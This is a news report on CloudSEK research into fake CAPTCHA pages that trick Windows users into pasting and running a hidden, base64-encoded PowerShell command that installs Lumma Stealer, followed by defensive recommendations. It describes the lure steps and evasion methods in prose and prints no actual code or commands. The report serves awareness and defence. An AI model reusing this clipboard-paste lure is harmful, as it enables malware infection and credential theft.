Fake Human Verification Pages Deliver Lumma Stealer Malware: CloudSEK

A new method of distributing Lumma Stealer malware has been uncovered by cybersecurity company CloudSEK, which targets Windows users through deceptive human verification pages. This technique, initially discovered by Unit42 at Palo Alto Networks, has prompted investigation into it being potentially leveraged to deliver various types of malicious software.

Threat actors create phishing sites hosted on various providers, often utilising content delivery networks. The user visits the fake verification page. These sites present users with a fake Google CAPTCHA page.‍ Upon clicking the “Verify” button, users are tricked into following these unusual instructions:

• Open the Run dialogue (Win+R).

• Press Ctrl+V to paste copied content.

• Press Enter.

Unknown to the user, this action executes a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard. The PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server, compromising the victim’s system. The downloaded malware then establishes connections with attacker-controlled domains, posing a risk to users and their data. 

"This new tactic is particularly dangerous because it plays on users' trust in widely recognised CAPTCHA verifications, which they encounter regularly online. By disguising malicious activity behind what seems like a routine security check, attackers can easily trick users into executing harmful commands on their systems,” said Anshuman Das, security researcher at CloudSEK.

Attackers use base64 encoding and clipboard manipulation to evade detection. According to CloudSEK, fake human verification pages have been hosted on platforms like Amazon S3 and CDNs.

The malware may download additional components, complicating detection and analysis. Although this campaign primarily targets distributing Lumma Stealer malware, it has the potential to deceive users into downloading various types of malicious files onto their Windows devices.

CloudSEK made recommendations for users and organisations to circumvent the malware attack. This includes educating employees and users about the new social engineering tactic, particularly the danger of copying and pasting unknown commands.

Organisations should deploy robust endpoint protection solutions capable of detecting and blocking PowerShell-based attacks. They should also monitor network traffic for suspicious connections to newly registered or uncommon domains, and regularly update and patch systems to reduce vulnerabilities exploited by Lumma Stealer.